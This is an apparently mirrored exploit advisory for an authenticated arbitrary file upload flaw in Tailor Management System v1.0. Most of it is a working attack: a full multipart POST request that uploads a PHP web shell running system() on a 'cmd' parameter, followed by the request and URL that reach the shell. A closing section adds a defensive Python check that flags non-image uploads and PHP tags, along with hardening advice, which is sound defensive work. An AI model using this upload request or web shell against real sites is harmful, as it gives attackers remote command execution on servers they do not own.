Tailor Management System - Arbitrary File Upload (Authenticated)

CVE: N/A
Category: CWE-434
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2020-10-10
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100063

Below is a copy:

# Exploit Title: Tailor Management System - Arbitrary File Upload (Authenticated)
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali Linux
# CVE: N/A



Step 1 - Request
POST /tailor/partedit.php?id=6 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------374227061277520034476021901
Content-Length: 943
DNT: 1
Connection: close
Referer: http://localhost/tailor/partedit.php?id=6
Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0
Upgrade-Insecure-Requests: 1

-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="type"

1
-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="title"

HIPS
-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="detail"

  Take out all of the stuff in the front and back pockets your trouser. The hip measurement should be taken around the hips at the widest point. Stand up in a relaxed posture, and keep the tape parallel. Do not tighten the tape measure. Make sure you can move the tape easily.
-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="bgimg"; filename="cmd10.php"
Content-Type: application/x-php

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
-----------------------------374227061277520034476021901--


Step 2 - Response

GET /tailor/img/part/cmd11.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/tailor/partedit.php?id=6
Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0


Step 3 - Read file uploaded

http://localhost/tailor/img/part/cmd10.php
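
A defender-side check for the upload shown in Step 1, added here as an example (it is not code from the advisory or from Tailor Management System): it parses a multipart/form-data body and reports file parts that are not genuine images. The function name, the image allowlist and the sample body are assumptions; the sample payload is a harmless constructed placeholder.

```python
import email
import os

# Assumption: "bgimg" should only ever carry an image. Extension -> magic bytes.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

def audit_upload(content_type, body):
    """Return a list of findings for the file parts of a multipart/form-data body."""
    # Prepend the request's Content-Type so the MIME parser knows the boundary.
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    findings = []
    for part in (msg.get_payload() if msg.is_multipart() else []):
        filename = part.get_filename()
        if filename is None:  # ordinary form field (type, title, detail)
            continue
        field = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        ext = os.path.splitext(filename)[1].lower()
        if ext not in ALLOWED:
            findings.append(f"{field}: extension {ext!r} not allowed")
        elif not data.startswith(ALLOWED[ext]):
            findings.append(f"{field}: content is not a real {ext} file")
        if part.get_content_maintype() != "image":
            findings.append(f"{field}: declared type {part.get_content_type()}")
        if b"<?php" in data.lower():
            findings.append(f"{field}: PHP open tag in content")
    return findings

# Constructed sample shaped like the Step 1 request; the payload is a harmless placeholder.
SAMPLE_TYPE = "multipart/form-data; boundary=constructed-boundary"
SAMPLE_BODY = (
    b"--constructed-boundary\r\n"
    b'Content-Disposition: form-data; name="title"\r\n\r\n'
    b"HIPS\r\n"
    b"--constructed-boundary\r\n"
    b'Content-Disposition: form-data; name="bgimg"; filename="cmd10.php"\r\n'
    b"Content-Type: application/x-php\r\n\r\n"
    b"<?php /* constructed placeholder */ ?>\r\n"
    b"--constructed-boundary--\r\n"
)

if __name__ == "__main__":
    print("\n".join(audit_upload(SAMPLE_TYPE, SAMPLE_BODY)))
```

The same rules belong in the application's upload handler, together with a server-generated stored filename and script execution disabled for the upload directory.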
